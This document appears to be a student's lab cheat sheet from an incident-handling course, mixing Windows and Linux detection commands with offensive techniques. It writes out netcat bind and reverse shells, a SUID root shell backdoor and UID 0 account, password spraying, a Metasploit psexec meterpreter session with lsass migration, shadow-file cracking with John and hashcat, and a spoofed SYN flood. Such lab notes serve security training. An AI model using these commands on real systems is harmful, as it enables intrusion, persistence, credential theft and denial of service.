#-------------------#
#      1.1          #
# know.whats.normal #
#                   #
#-------------------#

>windows:cheatsheet<


#--nc listener + taskmgr-----#

Setup nc listener: [nc -l -p 2222]
Find it via: [netstat -nao] (o includes PID #)
Good: xref PID from after running [tasklist] or [wmic process list brief] (task mngr output)
Better: [netstat -naob] - includes exe/dlls > listening ports (need elevated cmd)

taskmgr.exe>details>r.click on name>click PID>ok

[tasklist /v] -- shows processes + user running it

#---unusual srvs----#

[wmic process list full] - gives ++data (cmd line, os name, exepath, parentPID, etc)
[services.msc] - GUI win srvcs info
[sc query | more] - LUI of srvcs
[tasklist /svc] maps procs to srvcs

[FOR /R C:\ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi] - files > 10mb
/R = recursive
C:\= c drive
%i    = iterator var
In (*) = look everywhere BITCH
do = ...or else
@  = no show cmds
if    = statement
%~zi = iterator var file size
gtr = greater 
10000000 = 10mb
	echo = display

OR GUI>file explorer>search [size:>10m]

#---regedit---#

HKEY_LML\software\microsoft\windows\currentversion\run
HKEY_LML\software\microsoft\windows\currentversion\runOnce
HKEY_LML\software\microsoft\windows\currentversion\runOnceEx (only autorun task)


.:. Look for random startup/autorun files (also taskmgr>startup]

Lab 2:

Takeaway: know via IDS/IPS -+- detect + review logs for data exfiltration

Lab 3:
--->find unusual processes←-

# lsof -p [PID]
-->files/ports for PID of bd

# cp /bin/sh /tmp/backdoor (copy shell to new bd in temp folder)
# chmod 4111 /tmp/backdoor (give it executable root privs)
# find /tmp -uid 0 -perm- 4000 -print
# rm /tmp/backdoor


# cd /tmp
# cp /bin/nc /tmp/nc
#/tmp/nc -l -p 2222 &
# ls -l /tmp/nc  (or lsof -Pi)
# unlink /tmp/nc (rm the ls of the file)
# lsof +L1
# killall nc

#---unush UID 0---#

#grep :0: /etc/passwd
# useradd -o -u 0 -s /sbin/nologin test
# sort /etc/passwd -nk3 -t: | less (2nd first account)
# userdel -rf test
# clear


#--find sus net stuff----#

# ip link set eth0 promisc on (or off when ur done)
# dmesg | grep promisc

Lab 2.2: wireless lan

> FOR /L %N IN () DO @netsh wlan show networks mode=bssid | findstr "^SSID Signal" && ping -n 16 127.0.0.1 >NUL && cls

NMAP:
-->non-root nmap does full TCP 3wayhandshake scan
---> user nmap -sT as root (less logs+sus)
---> [-A] adds os detect/version/tracert/banners

Open ports:
-find vuln services + bd

#----win from nix----#

-smb: 135/139/445

#-----SMB SESSIONS----#
Focus: share list
--add [-m SMB2] force new use

>rpcclient+smbclient<

$ smbclient -L 10.10.0.1 -U sec504


$ rpcclient -L 10.10.0.1 -U sec504
$> enum{tabtab}
$> enumdomusers (find user accounts)
$> srvinfo (server info)
$> enumalsgroups domain (or builtin)
$>  lookupnames sec504 (1000)
$> lookupnames administrator (500)
$> lookupnames administrators (local group 4)
$> queryuser 500 (info for admin)

Win:
> net session
> net session \\10.10.75.1 /del
Y


#---find weak pwd---#
Focus: using builtin programs to pwd spray

PS > Set-ExecutionPolicy Unrestricted
PS > Import-Module .\LocalPasswordSpray.ps1
PS > Invoke-LocalPasswordSpray -Password Winter2019



Lab 3.1

#----netcat---#

---pull file (listener sends shit)----
> echo thisistext > text.txt
> nc -l -p 1234 < text.txt
$ nc 10.10.0.1 1234 > received.txt
$ cat received.txt




----push file (listener wants shit)------ 
$ echo sans > file.txt
> nc -l -p 4321 > received2.txt
$ nc 10.10.0.1 4321 < file.txt
> type received2.txt

---create bd-----

$ nc -l -p 7777 -e /bin/sh (shovel shell to attacker)
> nc 10.10.75.1 7777 (attacker)
> whoami
> pwd
> id

---reverse shell----

$ nc -l -p 8888
> nc 10.10.75.1 8888 -e cmd.exe (shovels cmd to *nix attkr)
$> dir
$> echo %username%

----relay----
 
> nc -l -p 54321 -e cmd.exe
$ mknod backpipe p 
$ nc -l -p 11111 0<backpipe | nc 10.10.0.1 54321 1>backpipe
#---another terminal/client---#
$ nc 127.0.0.1 11111
$> dir/whoami/hostname

-ncat send files-
$ echo “b00bs” > file.txt
$ ncat -l -p 8888 < file.txt
> ncat 10.10.75.1 > file.txt
> type file.txt

#--Ncat+ssl---#

$ ncat --ssl -l 443 -e /bin/sh
$ tcpdump -s0 -X -i eth0 port 443


Lab 3.2

#---arp/mac analysis---#


Find the weird address in alices arp table
Check macs on the arp table
Check switch table 
Correlate with asset inventory

3.4 --metasploit----

# msfconsole -q
msf5> show exploits
msf5> search type:exploit psexec
msf5> ls
msf5> info exploit/windows/smb/psexec
msf5> use exploit/windows/smb/psexec
msf5> set PAYLOAD windows/meterpreter/reverse_tcp
msf5> set RHOST  10.10.0.1
msf5> set SMBUSER sec504
msf5> set SMBPASS sec504
msf5> exploit
mtprt> bg
mtprt> sessions -l (find tht sesh)
mtprt> sessions -i 1 (exploit to get back to sesh)
mtprt> sysinfo/getuid/ps/getpid	

>>>>meterpreter pull hashes from registry stored in the FS (not memory)<<<<<<<

mtprt> migrate -N lsass.exe
Win--
> netstat -nao | findstr “EST”
> tasklist /fi “pid eq PID”
> wmic process where processid=PID get name









Lab 4:

#--johnnnyyyy---#

Focus: create accounts + see how quick john is to crack
/sbin/nologin - limit login 

# cp /etc/passwd /tmp/passwd_copy
# cp /etc/shadow /tmp/shadow_copy
# unshadow /tmp/passwd_copy /tmp/shadow_copy > /tmp/combined
# less /tmp/combined
# less /opt/john{tab}/run/password.lst
# john /tmp/combined
# deluser [homer]

4.2 ----hashcat----

-a [wordlist attack]
-m [hash type 3000 is lanman]
-r [rules file]

> hashcat64.exe -a 0 -m 3000 -r rules\Incisive-leetspeak.rule sam.txt password.lst
> hashcat64.exe -a 0 -m 0 -r rules\Incisive-leetspeak.rule md5.txt password.lst


XSS:
user input reflected in browser

reflected xss: mal URL + delivery + callback 

Lab 4.5:
Dos

> netsh advfirewall set allprofiles state off
> for /L %i in (1,1,20) do @notepad.exe
> tasklist | find /i /c “notepad.exe”
> wmic process where name=”notepad.exe” delete

# hping3 --syn --count 20 --spoof 10.10.11.11 -p 445 10.10.0.1 






